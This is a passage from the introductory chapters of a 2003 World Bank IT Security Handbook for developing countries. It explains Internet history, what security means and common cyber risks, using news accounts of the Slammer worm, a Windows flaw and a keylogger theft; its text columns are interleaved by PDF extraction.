modifying data and programs) trust in a developing country depend upon a secure and and integrity (insuring that information and software effective implementation of technology and infrastruc- remain intact and correct); ture. Governments, organizations, and individuals all · procedures for handling users: identification, have a part to play in assuring the security of the coun- authentication, and authorization; try's electronic and information assets. · common security problems that affect computers Information Technology Security Handbook EXECUTIVE SUMMARY 11 This Handbook contains a set of current best practices in security that may assist the reader in implementing the policies and procedures that are relevant to his or her situation. In addition, it includes ample references to other materials, both electronic and print, that cover specific aspects of IT security. This Handbook is one step in assisting with knowledge transfer and capacity building at the local level in the developing world. To this end, the IT Security Handbook will be offered by The World Bank as a print publication, a CD ROM, and a website which will be updated with fresh material on a regular basis. This first edition of the Handbook will be presented at the WSIS Conference in Geneva, Switzerland in December 2003. The World Bank enjoys copyright protection under protocol 2 of the Universal Copyright Convention. This material may nonetheless be copied for research, educational, or scholarly purposes only in member countries of the World Bank that are considered to be developing countries. The findings, interpretations, and conclusions expressed in this document are entirely those of the authors and should not be attributed to the World Bank, to its affiliated organizations, or to the members of its Board of Directors or the countries they represent. The IT Security Handbook is a living document and all of its sections can be found on the web site: http://www.infodev-security.net. Each section will be updated periodically with additional information on global IT security issues. Readers who would like to recommend material for publication in these updates are encouraged to send suggestions via e-mail to contact@infodev-security.net. 13 P A R T O N E I N T R O D U C T I O N CHAPTER 1. IT SECURITY IN THE DIGITAL AGE 14 CHAPTER 1. commercial business applications of all kinds, including IT SECURITY IN THE DIGITAL AGE financial transactions. The availability and reliability of the Internet is essential to the continued prosperity Introduction of developed countries, and it is quickly becoming important for developing countries as well. One of the most striking technological developments of The effects of the computer and the Internet revolution the last fifty years has been the emergence of digital go far beyond their direct uses and these effects are technology as a powerful force in our lives.5 For many of profound. us, this technology is embodied in the digital computer, which has evolved to be an essential tool for our work First, the Internet is capable of radically diminishing as well as our personal needs. In 1951, when the first the geographic isolation of those connected to it. The commercial electronic digital computer, a UNIVAC I, was Internet is facilitating globalization by providing a delivered to the U.S. Bureau of the Census, computers communications medium where everyone linked to it, were essentially unknown to most people, and were regardless of his or her location, is effectively the same found only in a few research laboratories and universi- distance away. Search engines underscore this change; ties. They were large, expensive, and prone to frequent search results are based upon content, not distance, so failure. In contrast, today's computers are relatively that web sites of firms in developing countries have an small, inexpensive, reliable, and are found in every equal opportunity to be seen in developed countries. country. Second, the Internet is a strong influence towards Shortly after computers became commonplace at disintermediation, i.e. the elimination of intermediaries universities, research projects were initiated to link (middlemen) in business and administrative functions. them together so that information could be passed One example is the drastic reduction in the number of between them. One such early project, the development secretaries employed in developed countries. The word of the ARPANET, was highly successful and led to what processor and electronic mail have made it easier for we know today as the Internet. From an initial network people to compose, print, and send their own messages of four computers in 1969, the Internet has evolved to than to tell a secretary what to type. Similarly, the the point today where it links over 300,000,000 com- travel agent industry is currently shrinking, due to puters worldwide. the public's new ability to book air and rail tickets and hotel rooms on-line. This is a development that saves The emergence of the World Wide Web, developed by the customer time, money, and, with the additional Tim Berners-Lee and Robert Cailliau at the Center control over one's preferences, may increase the chances for European Nuclear Research (CERN) in Geneva in of having a pleasant trip. The emergence of companies the early 1990s, is a powerful service that use the selling books, music, and electronics on-line has Internet to create a global information system and impacted the share of business going to classical off- increased substantially the Internet's utility and line retail shops, but at the same time may have attractiveness. Although many people equate the increased the size of the overall market in some sectors. Internet and the World Wide Web, the Web is While these off-line professions and industries will actually only one service out of many, albeit a continue to exist, they are likely to employ fewer peo- major one, that makes the Internet such a powerful ple and may their market share erode, and could move tool for information and communication. to specializing in niche markets rather than providing general services. The effects of disintermediation that Within the past ten years, the Internet has become have been initiated by technology are likely to continue an important tool for communication in all sectors for a long time and will displace more professions and of society. We depend on it for timely access to industries as information technology evolves. information, for private correspondence, and for 5See, Digital Tornado: The Internet and Telecommunications Policy FCC Staff Working Paper on Internet Policy (1997), available at: http://www.fcc.gov/Bureaus/Miscellaneous/News_Releases/1997/nrmc7020.html Information Technology Security Handbook INTRODUCTION 15 Third, the rate at which we work (our productivity) flourish and drive the quest for new areas for commercial appears to have accelerated, at least in industries driven exploitation, creating a golden age for digital appliances. by or dependent on information technology. Thanks PART to electronic mail, it is possible to share information Modern telephone equipment is completely digital in around the globe in seconds, so that worldwide discussions nature; mechanical relay switching devices have been ONE and negotiations can proceed in a very rapid manner. replaced with special purpose computer systems. Business once conducted by postal mail, telex, and Since the development of the CD in the early 1980s, telephone, is now conveyed through a faster and more music and other sound recordings have been making a effective means of communication, providing reduced transition to digital form. With the introduction of the cycle times for transactions. MP3 music format in the late 1990s, music and sounds have been recorded digitally, even in home environments. Finally, it is essential to maintain secure information Even data dense images are now digitized and cameras storage and communication links in this new environ- that record digital images are rapidly replacing images ment. The high-tech industry is actively exploring ways recorded on photographic film for many applications. of ensuring the security of its infrastructure; the partici- Even movies and animation are going digital, as the costs pants understand that security breaches stemming from of the relevant production and dissemination technologies insecure hardware and software along the Internet will are declining. The DVD is starting to replace videotape, inhibit some of the major promises of this new medium movies are made and edited with digital enhancements, from being realized. The establishment of trust in sound and the movie industry is beginning to distribute titles and safe computers, networks, and stored data in this digitally, instead of on reels of celluloid film. Electronic new environment is as important, if not more important, projectors are now in use in some theatres. as it was in an environment based upon face to face interaction. Cell phone standards, both de facto and de jure, are moving to digital, with protocols such as GSM, CDMA, The lesson for developing countries is clear; organizations TDMA and their variants and spin-offs displacing the that do not have the required level of security in their earlier generation of standards based upon analog digital infrastructure and thus do not protect their con- technology. In developed countries, digital television tent and information transmissions satisfactorily will not has been introduced and may eventually displace be trusted and might be left behind in the new global existing broadcast standards, although this change economy.6 is likely to come more slowly because of the large base of installed home receivers that depend on The Digital Revolution the older standards. Digital technology these days includes much more than Physical security systems are also becoming digital just computers. Technological progress in microelectronics in nature. In hotels, apartment buildings, and offices, has made the micro-miniaturization of complex electronic physical keys are being replaced by digital access cards. devices possible, so that you may now carry the Television cameras used for monitoring security are often equivalent of a roomful of computing and communications deployed on digital platforms, sending digitized images equipment in your pocket. Moreover, the improvement to monitoring stations on a network instead of sending in the price-performance ratio for this technology is a television signal to a standard video monitor.8 about 30% per year and likely to stay at that level for another ten years.7 We expect this technology to 6Braga, Carlos Prima, Inclusión or Exclusion, UNESCO Courier, available at: http://www.fcc.gov/Bureaus/Miscellaneous/News_Releases/1997/nrmc7020.html 7This rate of technological advance is a corollary of 'Moore's law,' described by Gordon Moore, the father of Intel, in the 1960's. He observed that every two years (later shortened to 18 months), the technology allowed manufacturers to produce chips with double the capacity for about the same price. This trend has been observed for the past 40 years, and the industry expectation is that it will continue for another 10 years. 8Interestingly enough, this particular transformation may well export jobs to developing countries. Once the images are in digitized form and trans- mitted on the Internet, they can be sent to a monitoring system anywhere on the net. It has been suggested that this security function, which does not require specialized skills, could be set up in developing countries at lower costs, and with equal quality of service. The suggestion is welcome in a development context, but could have physical security implications in that the outsourcing depends upon crossing national boundaries. 16 INTRODUCTION Many of the services that we use today would not be for the purposes that you understand and agree to. possible without computers and networks and the Most individuals value their privacy and many digital technology on which they are based. Airlines governments have chosen to uphold individual would not be competitive without computer based rights to privacy to a certain extent, though the reservation systems and flight and maintenance level of protection varies from country to country. support systems. Planes themselves depend massively The challenge for governments is to assure that we on electronic sensors and digital controls and can realize the benefits of emerging technologies would be unable to function without them. Even and still maintain the values and freedoms that we automobiles use microprocessors to function and enjoyed without them. This is a challenge that to assist in their maintenance today. Global requires governments to understand the new tech- Positioning Systems (GPS) permit you to know nologies and evaluate how the devices and capabil- where you are anywhere on the earth. With this ities interact with our freedoms. Government must relatively inexpensive device and a computer also take proactive steps to ensure that legislation containing a base of maps, you are able to track and public policy reflect a lasting commitment to where you are going, find important landmarks, maintaining, if not strengthening, the freedoms restaurants, entertainment, or services along the that exist currently. way, and ultimately to reach your destination. We often refer to the digital world as cyberspace.10 These digital devices are being networked at Cyberspace includes all of the computers and other a rapid rate. Cell phones 'talk' to the Internet, digital devices that are connected to both internal transmitting initially voice and now pictures. Soon and external networks and can communicate with they will have GPS capability, so that people in each other. We can talk about meeting in cyber- trouble can be located with great precision when space and doing things in cyberspace, as opposed they make an emergency call. Many of the services to physical space. For readers of this Handbook, we use, such as ATM machines for disbursement of in particular, it is useful to make a distinction money, rely on network access. Inter-bank and between behavior in cyberspace as opposed to international financial transfers have long depend- the "real world" in which we live, work, and play. ed upon financial networks;9 nowadays, electronic personal banking transactions are accessible to The rapid spread of the personal computer and the individuals via the Internet. Internet to developing countries has brought many benefits to all sectors in those countries. However, This explosion of digital electronics and the Internet by itself is not necessarily a medium interconnected devices presents many opportunities, secure from malicious behavior. The opportunity but it also has a dark side. It is becoming easier cost of not paying adequate attention to security for people to track where you are, to catalogue can be the loss of valuable data needed to run an what web pages you visit, to study what you enterprise or a government agency. Among other purchase at stores, and to observe what you read things it can include destruction of essential and watch online. If such monitoring is intended records, identity theft, and theft of financial for your benefit, you probably won't object to it, resources, outcomes that cannot only ruin a but you will want to be sure that such data is company, but that can contribute to a reputation collected with your permission and is used only of unreliability for an entire industry in a country. 9 The interbank financial transfer network has in the past used a special, highly secure, special purpose network, not logically connected to the Internet. This is appropriate, given the high value added nature of the network and the very serious consequences of any compromise of the network. 10"Cyberspace" was originally coined by author William Gibson to mean a parallel universe created and sustained by the world's computers. The term cyberspace was actually invented by William Gibson and used in his 1984 novel, Neuromancer. "A consensual hallucination experienced daily by bil- lions of legitimate operators, in every nation, by children being taught mathematical concepts... A graphic representation of data abstracted from the banks of every computer in the human system. Unthinkable complexity. Lines of light ranged in the nonspace of the mind, clusters and constel- lations of data. Like city lights, receding..." This definition may be useful for literary purposes, but the meaning of the term has shifted substantially from Gibson's usage. See Intven, et al., Legal and Regulatory Aspects of e-Commerce and the Internet, The World Bank Legal Review, vol. 1 2003, at fn 17. (Kluwer). Information Technology Security Handbook INTRODUCTION 17 As the Internet expands and issues regarding cyber can result in both real and perceived damages, and can attacks become more widespread, the number of such result in business failures in countries which need the incidents is increasing: confidence of external business relationships in order to PART prosper. Achieving the Millennium Development Goals "Although computers have up to this point been spared depends on developing countries being able to use a major cyber attack from terrorists or rogue nations, information technologies effectively and to increase ONE there have been plenty of smaller acts of vandalism their wealth by becoming integral members of global by individual troublemakers. The Computer Emergency commerce.14 The ability to obtain and supply relevant Response Team (CERT) tracked 52,658 online security information easily can help countries in all areas of civil incidents in 2001, more than double the number reported society, whether it is education, health care, commercial in the previous year, and more than four times the number development, expansion of international markets and reported the year before that."11 trade, or strengthening of local cultures. The issue of the security of computers and networks Unfortunately, all of the manifestations of human is especially important for developing countries. behavior possible, good and bad, have moved into The Internet can essentially eliminate any disadvantage cyberspace and can be observed there. Since it is easy due to distance or remoteness of location and it can to copy digital content and edit it, it is also easy to provide access to an enormous amount of content, no falsify information, including the modifying and forging matter what the distance is between the person official documents. Because the Internet evolved from a requesting the content and the content repository itself. cooperative research environment, where the goal was Together with the World Wide Web, the Internet can to share information easily, the underlying structure place businesses in developing countries on a more makes it possible to break into computers and steal equal footing with respect to information about compa- confidential information. The motivations of people who nies, their capabilities, and their products. Furthermore, exhibit such behavior in cyberspace are similar to the search engines do not make a distinction between web motivations that drive them in the real world, with sites based on geography, so that suppliers of goods one significant exception. The environment created and services in developing countries can be seen on by computers and the Internet has brought out tendencies a par with suppliers of those goods and services based in certain people to prove that they can break into in developed countries.12 This is sometimes referred systems or cause other problems. Much of the mischief to as the "death of distance,"13 a phrase which graphically in cyberspace is caused by "crackers" who simply want describes what the Internet has accomplished for to prove that they can defeat any security barriers that information and information flows. may be in their way. The equivalent behavior in the real world consists of someone who demonstrates that he can However, there are the real risks to business of loss break into your house but after doing so, leaves. Not only of records, denial of service attacks, corruption of does this generate a profound feeling of insecurity, but it information, and other hostile attack effects. For a also raises the question of whether anything was taken or business to have all or part of its electronic records changed, or whether the next attempted entry will be altered or erased can be devastating. For a country to more malicious. Just as such behavior in the real world have a reputation for weakness in IT security can taint can't be tolerated, neither should it be tolerated in cyber- its industries, regardless of the actual extent of damage space. Techniques in this Handbook will help you to guard that may have occurred. Lack of attention to security against such malicious behavior. 11Reuters/USA Today, April 16, 2003. 12Search engines do differentiate on the basis of language, so that as in the real world, you have to speak in the language of your target market. Search engines may also not have the patience to retrieve web pages at the tail end of slow connections. However, businesses can host their web sites anywhere in the world, so that information can be placed close temporally to target markets. Some businesses mirror their web sites, i.e. create copied in different geographic regions so that customer access time is minimized. 13?, Cairncross, F., The Death of Distance: How the Communications Revolution will Change our Lives, Harvard Business School Press (1997). 14Information and Internet security are one of the three main topics on which the World Summit on the Information Society will focus at its conferences in Geneva in December 2003 and in Tunis in April 2005. This is additional evidence of the broad recognition that the role of ICT for development is achieving. 18 Nothing in this Handbook or in cyberspace should return on that investment that is sufficient to make you reluctant to learn about computers and justify it. As we know, some investments provide the Internet and exploit them to the fullest. that return, even handsomely, while others do not. Today's Internet represents the beginning of a Some investments involve emotional risk. When we wonderful set of transformations of the world's commit ourselves to a personal relationship, we hope stock of information and knowledge, including that the relationship will provide emotional security, the ability to distribute it to the general public though we accept the risk that it may not develop inexpensively; information can be efficiently and that way. effectively shared for the good of all. However, in order to realize this goal, we need to take account In some areas, it is impossible to obtain the of possibilities and behaviors that may stand in degrees of security that we would like to have. our way. We're familiar with the concept of being For example, we would all like to live a long and "street smart" in the real world. We must now healthy life and many of us will do so. However, learn how to become street smart in cyberspace, what is true for a statistical average of lifetime or "cybersmart;" this Handbook is meant to help expectancy is not true for all individuals; some you accomplish just that. of us will die at an early age, some will develop debilitating illnesses, and others will live, in good What Is Security? health, to old age. Where risk of this sort is concerned, we compensate for our inability to The notion of security in the real world is an intuitive control our physical fate with insurance that one for most of us. In prehistoric time, security was protects us against the financial impact of such defined by the essentials of survival such as security events, loss of earnings in the case of illness, against attack by others or by animals, as well as for example. Such arrangements highlight a truth security of the food supply. Other needs, such as about security: absolute security is impossible security against the ravages of nature or against to achieve in real life and in cyberspace. sickness were generally not available to them. However, security that is "good enough" is likely As civilization progressed, the scope of security to be achievable in almost all circumstances. evolved to include having a place to live and sleep without harm. Along with the concept of private There are a variety of ways in which we have property came the notion of security of possessions. historically enforced or provided enforcement mech- anisms for enhancing and protecting our security. Much of what we do in the world involves risk, We have physical mechanisms for ensuring the although most of our actions involve minimal risk. security of our possessions: sturdy building con- For example, when we travel in an unfamiliar neigh- struction, solid doors, and keys and locks. We may borhood, or city, or country, we are conscious of the rely on other physical barriers, such as walls and fact that there are threats to physical security. These other deterrents. We may choose to keep lights threats are more substantial if we are in an unprotect- focused on an area of potential entry. Finally, ed place and we meet someone who may be able to assuming that an intrusion is initially successful, take advantage of us. If we are sufficiently concerned we can use alarm systems to detect it and to notify about the risk, we will avoid the location or we may a stronger deterrent force that we need assistance. choose an alternative, such as joining someone else If an intrusion has been successful, we have foren- to return to a safer location, or taking a taxi. sic techniques at our disposal to search for clues to the event and to track down the culprit. Most Some actions involve psychological or financial risk, important, we can rely upon civil and criminal laws but not physical risk. When we make an investment and a system of enforcement and justice that each of any kind, say in land, in stock, or in a business, of our countries is evolving in response to our we do so with the expectation that we will obtain a national needs. Information Technology Security Handbook INTRODUCTION 19 Often we use multiple methods of maximizing An example of the nature of cyber-security is P our security so that if one method fails, another provided here; the recent discovery of a flaw ART may work. If a key has been stolen and the lock found in the core of the Microsoft Windows in the door is no longer a barrier, the alarm signal operating system: may suffice to provide notice of an intrusion. The extent to which multiple barriers are used "Microsoft Corp. acknowledged a critical ONE is, of course, related to the value of what is vulnerability Wednesday in nearly all versions being protected. The extent to which physical of its flagship Windows operating system security measures are put into effect is related software, the first such design flaw to affect both to what is to be protected and to the its latest Windows Server 2003 software. reasonable expectations that it will be attacked. Microsoft said the vulnerability could allow All of these deterrents and methods have their hackers to seize control of a victim's Windows analogues in cyberspace. We're not as familiar computer over the Internet, stealing data, with them as we are with physical security issues, deleting files or eavesdropping on e-mails. but we need to understand them and know how The company urged customers to immediately to use them if we are to live as securely in apply a free software repairing patch available cyberspace as we do in the real world. In both from Microsoft's Web site... worlds we need to protect our assets, to defend them if attacked, and to recover if the attack The flaw, discovered by researchers in western is successful. Poland, also affected Windows versions popular among home users. "This is one of the worst The dictionary definitions of security are consistent Windows vulnerabilities ever," said Marc Maiffret, with conditions we associate with security, such as an executive at eEye Digital Security Inc. of Aliso "the quality or state of being secure, freedom from Viejo, Calif., whose researchers discovered similarly danger, and freedom from fear or anxiety.15 dangerous flaws in at least three earlier versions However, such definitions do not seem really of Windows. Maiffret said that inside vulnerable helpful in the context of cyberspace. Instead, we corporations, 'until they have this patch installed, suggest the following: you are secure in cyberspace it will be Swiss cheese ­ anybody can walk in and when access to your information resources is under out of their servers.' your control, i.e. no one can do anything to the resources that are yours without your express But four Polish researchers, known as the "Last permission. The resources include computational, Stage of Delirium Research Group," said they access, network, transaction, process and discovered how to bypass the additional information resources. Of course, some of these protections Microsoft added, just three months resources may have been provided by others for after the software went on sale. Although the your use, such as an account on a shared Polish researchers created a tool to demonstrate computer or access to the Internet by an Internet the more serious vulnerability and break into Service Provider. While they are never completely victim computers, they promised not to release secure, you have effective control over having blueprints for such software onto the Internet ... continued access to them to the extent that you follow the rules that the providers set for their Some experts said they expected hackers to appropriate use. begin using this new vulnerability to break into computers within months. Even without detailed 15Merriam-Webster OnLine Dictionary. 20 blueprints from researchers, hackers typically Similar situations exist in the world of cyberspace. break apart the patches Microsoft provides for However, given the nature of cyberspace and the clues about how to exploit a new flaw."16 interconnectedness of the computers within it, the policy of security by obscurity is weak policy and As individuals and employees within organizations should be avoided. This Handbook will provide we have no control over the code contained in propri- details on the special security measures required etary programs like Microsoft Windows. We trust that in electronic space (cyberspace) at several levels. software vendors have a strong interest in making their programs error free and secure. However, few Emergence and Growth of the Internet large programs are completely error free. In response, we can take action when such problems are reported The computing and networking environment from which by making an informed judgment whether to download today's Internet evolved had its origins in a cooperative and install the vendor's 'fix' for the error. This is the research and education culture. When the ARPANET, extent of control that we have. the predecessor to the Internet, was first implemented, the main goal was to share resources among groups In real life, we are already knowledgeable about how of researchers in different geographical locations. we protect our information resources. We understand The groups had compatible goals and worked toward that some information needs to be kept private while sharing both computing resources and data. Access other information can be freely circulated. We lock file to the network was restricted to members of the group, cabinets and office doors and may store copies of criti- so there was no need to be concerned about security cal information off-site to guard against loss through at the time. The intent and design of the World Wide fire and natural disasters. We know that some informa- Web exemplifies this; it provides substantially better tion should only be circulated to a limited number of tools for discovering information resources and for people and we trust different people to different making one's own information available to others, extents depending upon the confidentiality of the without any mechanisms for obtaining permissions information at hand. or facilitating financial settlements. The nature of threats to security in cyberspace is The culture of sharing among researchers and academi- conceptually no different than the nature of threats cians that was born in and nurtured by the ARPANET in the real world. The differences come from the lasted well into the 1990s, and there are still vestiges characteristics of the electronic space in which the of it today. It included the notion of making informa- threats appear and the manner in which they can be tion as available as possible, and that tradition still thwarted, avoided, detected and resolved. exists in the form of the World Wide Web, where content of all kinds is being provided, almost free of charge, to The notions of privacy and confidentiality are related to hundreds of millions of people around the world. It was security. Information that is meant to be private can a strong culture, and it was responsible in large part for only be kept private if it is stored in a secure manner. why the Internet has grown to such an enormous size With information in the real world, that may be accom- today. Its ethics are reflected in the words of people who plished by acting as if the information does not exist; are Internet "evangelists," who see the power of the medi- such a security policy might be termed "security by um for development, and who work to make it happen. obscurity." Similarly, information that needs to be confi- Sometimes called the spirit of the Internet, it is reflected dentially shared requires that it be kept secure from in the mantra that "information wants to be free." those outside the group who are sharing it. If the group is not all in the same place, adequate security policies An alternative way of describing this situation is that must include a way of keeping the information secure the early Internet was based on trust; the community when it is transmitted among members of the group. of users trusted each other implicitly to work for the 16Ted Bridis, The Associated Press July 16, 2003. Information Technology Security Handbook INTRODUCTION 21 common good. As the Internet has broadened its reach The Internet is open. Formally defined as a network P and included more and more people with diverse inter- of networks, any network that conforms to a family ART ests and objectives, the trust model has become insuffi- of protocols known as TCP/IP (Transmission Control cient. One of the major challenges for today's Internet Protocol/Internet Protocol) can connect successfully is to develop a new trust model that is realistic, easy to with it and become a part of it. The standards defining implement, and effective in its application. this family of protocols come from the work of the ONE Internet Engineering Task Force (IETF), an informal The Internet is different from earlier communications technical body based on technical meritocracy and systems in a variety of ways, but several are particularly the creation of implementable consensual standards. important. Some differences are best understood when compared to the public switched telephone network The Internet is decentralized. There are no system-wide (PSTN) that is used worldwide on a daily basis. gatekeepers. If you obey the "rules of the road," i.e. the TCP/IP standards, you can connect your computer The Internet is based upon a model of information or your network to the Internet. transmission called packet switching. Every time information is transmitted over the Internet, it is broken up into The Internet is abundant. The barriers to entry are low packets of binary data. The packets are encoded and and the amount of bandwidth, (i.e. how fast you can sent independently over the network, possibly by different transmit data through it) depends upon the carrying routes, and the information is reassembled at the capacity of the copper wires, fiber links, or satellite receiving end. This mode of transmission is called packet channels that are in the path. No scarce electromagnetic switching, as opposed to circuit switching. The public spectrum is involved for the Internet backbone. Where switched telephone network uses circuit switching, in radio spectrum is used, for example in the deployment of which each telephone call is allocated a single circuit local area wireless networks, often called "Wi-Fi," the for the duration of the call, no matter how much or how relevant protocols or rules implement a sharing arrange- little sound is being transmitted at any given moment. ment for the available spectrum rather than a rigid allo- cation that ultimately denies access to the network. The Internet is "stupid"17 in that all it knows how to do is to deliver packets from an origin connected to The Internet is relatively inexpensive for the average the network to a destination connected to the network. user in parts of the world where local calls are free. All services originate at the edge, or the boundary, of The price of access over dial-up lines and at cybercafés the Internet in the computers attached to it. This is and other public Internet access points is descending in contrast to the PSTN where the intelligence is at in such countries, so that access is becoming broadly the center of the network (at the switch), and the affordable for a greater percentage of the world's user instruments at the edge have little functionality population. other than being used for speaking and listening. The Internet erodes the traditional barrier between The Internet is global. It connects many countries, author and publisher; you can become a publisher and information generally flows freely across national or establish a network service on your computer if borders. This characteristic raises interesting policy con- it is permanently attached to the Internet. You can cerns not necessarily directly concerned with advertise the services and, subject to permissions that security. The PSTN is also global, but the methods you establish, anyone else connected to the Internet of accessing phones in different countries are not as can connect to your computer and use those services. opaque as they are with the Internet. The user knows The Internet is by and large user-controlled. In many that he is dialing a foreign country, for example, where- countries, you can choose whether your messages as he may access a website without knowing where the and other transmissions should be encrypted or not. servers are located. 17See, Lessig, L, The Future of Ideas, Random House (2001). 22 INFORMATION SECURITY AND GOVERNMENT POLICIES In addition, filtering of messages for whatever reason is who cannot unlock that information with the right key. under your control, although you may wish to have an external source do it for you, such as instructing your In comparing the real world with cyberspace, we also Internet Service Provider (ISP) to filter out spam mes- observe some of the same violations of trust and sages according to rules that you set up. confidentiality. In both worlds, it is possible to forge a false return address and even a false signature. The Internet is interactive. You can move quickly In both worlds, it is possible to provide misleading and easily between access to multiple content providers or erroneous information. In both worlds, it is possible and sending and receiving electronic mail with many to deluge someone with information, either accidentally people. While waiting times for on-line services depend or deliberately, making it impossible to determine which upon the size or bandwidth of your connection to the information is important and relevant.18 And in both Internet, it is often possible to get response times that worlds, it is possible to gain access to confidential support your activities. information and use it in unintended or illegal ways. The Internet can be vulnerable. Based initially upon There are, however, three important differences. a concept of providing services to a relatively homoge- neous, cooperative group of people, certain aspects First, violations of security of all types of cyberspace can of trust were assumed rather than required to undergo take place very rapidly. That means that by the time you strict verification. This Handbook addresses the understand what is happening to your information assets, Internet's vulnerabilities and provides you with a it may be too late to prevent damage. Of course, not all set of best practices in security that will help you violations occur quickly; some attacks are observable as to minimize your vulnerability. they occur and take time to execute. The lesson to draw from this is that preventive measures taken to protect Based on the above characteristics, you should be getting against violations are far superior to detecting a violation a picture of an Internet that is supportive and permissive while it is happening or after it has been completed. of many kinds of activity, rather than one that is restrictive and controlled. This openness strongly Consider the following account of the 'Slammer worm,' reflects the academic and research roots of the Internet, which severely disrupted the Internet early in 2003. and is responsible for its usefulness for all of us. The All continents and many countries were affected, includ- Internet was not designed to maximize security, but ing many developing countries. instead to maximize the fruits of collaborative work; such a degree of openness has provided opportunities "Slammer (sometimes called Sapphire) was the fastest for some people to misuse the network in ways that are computer worm in history. As it began spreading harmful to others. We need to understand what those throughout the Internet, the worm infected more misuses are and guard our networks against them. than 90% of vulnerable hosts within 10 minutes, causing significant disruption to financial, transporta- Information Security Issues tion, and government institutions, and precluding any human-based response ... " The concepts of computer, network, and data security in cyberspace are similar to issues in the real world, how- "Slammer began to infect hosts slightly before 0530 ever, the mechanisms are different. For example, UTC on Saturday, 25 January 2003, by exploiting a in place of keys (physical or electronic), we have buffer-overflow vulnerability in computers on the passwords to accounts that allow access to information Internet running Microsoft's SQL server or Microsoft and services. In place of sealed envelopes, we are able to SQL server Desktop Engine (MSDE) 2000. David encrypt information so that it is not readable by others Litchfield of Next Generation Security Software 18The S.S. Titanic used relatively primitive radio to communicate from ship to shore. On its first voyage, the radio operator was so deluged with con- gratulatory and personal messages that a critical message, warning of significant icebergs in its path, was not identified as important or acted upon. The ship struck an iceberg and sank several hours later. Information Technology Security Handbook INTRODUCTION 23 discovered this underlying indexing service weakness Information destruction. The data stored on your P in July 2002. Microsoft released a patch for the computer could be deleted. It might be possible ART vulnerability before the vulnerability was publicly to recover it, but it could take time and the recovery disclosed (www.microsoft.com/security/slammer.asp). might not be complete. If you are a government Exploiting this vulnerability, the worm infected at agency, your ability to perform your functions during least 75,000 hosts, perhaps considerably more, and this period may be compromised. ONE caused network outages and unforeseen consequences such as cancelled airline flights, interference with Information theft, and loss of privacy. You may or elections, and ATM failures."19 may not be aware of the theft immediately (or ever) and it is unlikely that you will know who took your Second, you do not have to be physically present at data, what was taken, or what will be done with it. a location, or even in the same country, to commit a If a great deal of your personal information is taken, security violation in cyberspace. This means that the thief might be able to steal your identity with someone in Europe, for example, can probe the security unknowable, but probably serious, consequences. of computers in India just as easily as a person located across the street from the target. In cyberspace, the Loss of information integrity. The information on threat can come from anywhere on the network. It may your computer could be modified without your knowl be directed at a known target, the target may have edge. Depending on what kind of information you been selected at random, or it may have been chosen keep, the consequences could range from trivial to because its Internet address was in a range of addresses disastrous. being probed as a unit. This omnipresent threat should change the way in which we think about security and If the data include enterprise financial records, the profile of our possible adversaries. It is worth customer information, order status, or personnel files, noting that the Digital Millennium Copyright Act makes your business dealings could be adversely affected, it illegal to design software that decrypts encryption software; national and global copyright regimes on this Loss of network integrity on other systems and/or and other matters related to copyright and data protec- networks. Although you may not be attacked directly tion are in active development at the present time.20 in this case, other computers to which you have access may be attacked with trickle down Third, cyberspace provides a powerful but complex consequences to you. If you are a financial environment, in which the responsibility for security institution, you may not be able to complete is divided among multiple players. If you are a user financial transactions during the recovery period. of computing and network services, there are a number of ways to protect yourself and your personal computer. Keystroke capturing. Hidden software could be However, you cannot control your ISP's security policy installed on your computer that would capture your or its implementation. Nor can you control your client's keystrokes and send them to another computer. software, even if you are closely linked with their sys- This could compromise your access to external tems. Thus you need to assume a protective stance over sources, such as a protected web server, an e-mail your own assets, while being aware that the connec- server, financial transactions, or confidential tions you are making with the outside world prevent information. Authentication tokens such as credit you from eliminating all vulnerabilities on the network. card numbers and passwords could be obtained by the thief and used in later transactions for his or her What are the possible risks in cyberspace? If you take personal gain. no security precautions at all, here are some of the possible consequences: 19Moore, Paxson, Savage, Shannon, Staniford and Weaver, "Inside the Slammer Worm," IEEE Security and Privacy, Vol. 1, No. 4, July/August 2003, pp. 33-39. 20For an overview of recent thinking on the Act, see the U.S. Copyright Office Digital Millennium Copyright Act Study at: http://www.copyright.gov/reports/studies/dmca/dmca_study.html The DMCA itself is available as a pdf file: http://www.copyright.gov/legislation/hr2281.pdf 24 INFORMATION SECURITY AND GOVERNMENT POLICIES Denial-of-Access. You could be denied access to your by themselves. He then saw an account being opened own information, even though it has not been erased. in his name at an online payment transfer service. It might appear in encrypted form, where only the Jiang, who is awaiting sentencing, admitted installing intruder has the decryption key. Invisible KeyLogger Stealth software at Kinko's as early as Feb. 14, 2001."21 The cost associated with recovering from any of these attacks is likely to be substantial, and the recovery This Handbook is about security as applied to users, process is likely to be inconvenient at the least. both in the home environment and in small to If you are the director of an enterprise with a critical medium-sized businesses. Therefore, it contains dependence on your electronic data resources, an extensive information on security issues, including extremely malicious attack could lead to the demise of threats and outcomes of attacks, approaches to your enterprise. Note that the Slammer worm was indif- protection of your computers, networks, and data, ferent to which countries it invaded and which organi- and also policy issues that must be considered before zations and computers it disabled; any computer that an effective security strategy may be implemented. did not have a Microsoft patch installed was attacked. The ultimate purpose of this Handbook is not to frighten users away from resources offered by the One noteworthy security breach that succeeded for more new digital environment, but to empower users to than a year illustrates the novel ways in which security take advantage of this exciting new world in a safe can be compromised in cyberspace: and secure manner. The objective is to develop an in-depth and realistic understanding of what the "NEW YORK (AP) - For more than a year, unbeknownst security problems are, in order to minimize to people who used Internet terminals at Kinko's vulnerabilities and reap the benefits from the many stores in New York, Juju Jiang was recording what positive and powerful aspects of ICTs. they typed, paying particular attention to their pass words. Jiang had secretly installed, in at least 14 What Motivates the Security Violators? Kinko's stores, software that logs individual keystrokes. He captured more than 450 user In real life, there are a variety of motivations for names and passwords, using them to access crimes against personal or organizational security. and even open bank accounts online. Financial gain is a major incentive, as is revenge against someone or something that a person feels The case, which led to a guilty plea earlier this has wronged them in some way. month after Jiang was caught, highlights the risks and dangers of using public Internet terminals at The same motivations exist in cyberspace, but there cybercafes, libraries, airports and other establish- is an additional motive that is apparently quite ments. "Use common sense when using any public compelling. Cyberspace is seen as a challenge by terminal," warned Neel Mehta, research engineer at one group of people, often called "crackers," who Internet Security Systems Inc. "For most day-to-day regard the ability to break into accounts and be stuff like surfing the Web, you're probably all right, mischievous as a game or sport. In other words, but for anything sensitive you should think twice." they consider it an achievement to be able to break Jiang was caught when, according to court records, into computer accounts, databases, and network he used one of the stolen passwords to access a equipment just because it is there, whether or not computer with GoToMyPC software, which lets someone has protected it. This type of behavior individuals remotely access their own computers does not have a significant analog in the real world. from elsewhere. The GoToMyPC subscriber was home at the time and suddenly saw the cursor on 